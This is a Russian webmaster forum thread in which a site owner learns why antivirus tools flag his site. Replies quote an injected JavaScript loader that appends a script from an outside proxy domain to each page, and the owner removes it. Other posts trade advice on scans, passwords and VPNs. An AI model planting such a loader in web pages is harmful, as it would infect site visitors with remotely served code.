На страницу 1, 2 След. |
|
|
Вот сайт seriali-karpov.ru. У меня стоит каспер и все норм., но недавно от людей узнал что например аваст (может и еще какие) пишет что на сайте вирус.
Впервые сталкиваюсь с таким...шаблон из паблика и насколько я понимаю хрень эта где то в коде шаблона. Где и как искать то гадость эту? |
|
|
|
|
|
В самом верху скрипт какой-то непонятный. Весь пошифрованный и запутанный. Его сноси.
PS:щас тоже смотрю этот сериал |
|
|
|
|
|
Да, до того как начинается заголовок <html> вшит скрипт, он скорее всего и палит тебя перед авастом:
Код: |
<script type="text/javascript">
(function(w) {
var script = document.createElement('script');
var i = setInterval(function() {
if (typeof w.document.body !== 'undefined') {
script.src = 'http://430.go.345.proxy-anyone.info' + '/?533954=tv-2sOSgrq2hqaumsf_z8_f3-w';
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);
</script>
|
|
|
|
|
|
|
Действительно. Касперыч на прокси-эниван.инфо ругается
Нужно снести, и желательно поменять пароли от хостинга. Мало ли чего |
|
|
|
|
|
Угу,снес...непонятно откуда он взялся...Спасибо за помощь |
|
|
|
|
|
Цитата: |
Угу,снес...непонятно откуда он взялся...Спасибо за помощь Drinks or Beer
|
В шаблоне скорее всего был. |
|
|
|
|
|
Могли ломануть и поставить... у меня чет последнее время частенько такое.... |
|
|
|
|
|
Ashhbben писал(а): |
Могли ломануть и поставить... у меня чет последнее время частенько такое....
|
почисти комп Dr.Web CureIt (бесплатный одноразовый антивир).
прогони свежим AVZ минимальную проверку с максимальными настройками.
и будет счастье.
ну и после всех манипуляций, строго после их окончания и удаления бяки - сменить все пароли.
не помогло? стоит рассмотреть переход на другой фтп-клиент, ну и шифрование трафика (буквально пару недель назад увели пароль от контактика при подключении к хотспоту в кафе. я в восторге просто от этого, пришлось установить TunnelBear на смарт и включить ssl на вконтактике). |
|
|
|
|
|
Могли ломануть и поставить... у меня чет последнее время частенько такое.... Sad
|
Не только у тебя
TunnelBear на смарт и включить ssl на вконтактике).
|
Нужно юзать впн как делают 99% вебмастеров, тем более не в своей зоне вайфая. |
|
|
|
|
|
awm543322445 писал(а): |
TunnelBear на смарт и включить ssl на вконтактике).
|
Нужно юзать впн как делают 99% вебмастеров, тем более не в своей зоне вайфая.
|
я в большей степени не ожидал что упрут контактик и разошлют смарт, не смотря на то что был со смарта.
теперь же - паранойя охватила меня
подумываю насчёт поднять ВПН для себя на своём же сервере. чтобы не заморачиваться всякими там тунель-бирами и их лимитными трафиками. |
|
|
|
|
|
Постоянно сталкиваюсь с тем, что антивирус блокирует сайты партнерок и другие. Например, http://prcr.org/ или http://olike.ru/. Пишет: URL заблокирован SpIDer Gate. Причина: Нерекомендуемый сайт. Др. Веб.
Проблема у них или у меня? |
|
|
|
|
|
Claudia, у них конечно. Ты на это никак не можешь повлиять и создать кому-то проблему. Пусть они (партнерки) разбираются с блоком, пишут в техподдержку антивирусов и просят убрать их из блек-листов. Если уберут, тогда при следующем обновлении баз твой антивирусник перестанет на них фыркать. |
|
|
|
|
|
подумываю насчёт поднять ВПН для себя на своём же сервере. чтобы не заморачиваться всякими там тунель-бирами и их лимитными трафиками.
|
Можно поднять на своем, но проще и дешевле купить у сервиса. Смотри подпись
Проблема у них или у меня?
|
Сайт смс разводов, поэтому часто их заносят ав в свои базы. |
|
|
|
|
|
Сайт смс разводов, поэтому часто их заносят ав в свои базы.
|
А форум zismo за что? Пару раз натыкалась на темы в поиске, даже не могу посмотреть про что он.
А почему владельцы сайтов не реагируют? Они ведь так посетителей теряют. Или они не знают? |
|
|
|
|
|
А форум zismo за что?
|
Форум могли взломать и повесить туда скрипт заражающий посетителей. Поэтому рекомендую регулярно обновлять браузер, флешплеер и JAVA(не путать с яваскриптом).
А почему владельцы сайтов не реагируют? Они ведь так посетителей теряют. Или они не знают?
|
Ну они же по факту занимаются обманом(мошенничеством), поэтому приходится нести такие затраты. |
|
|
|
|
|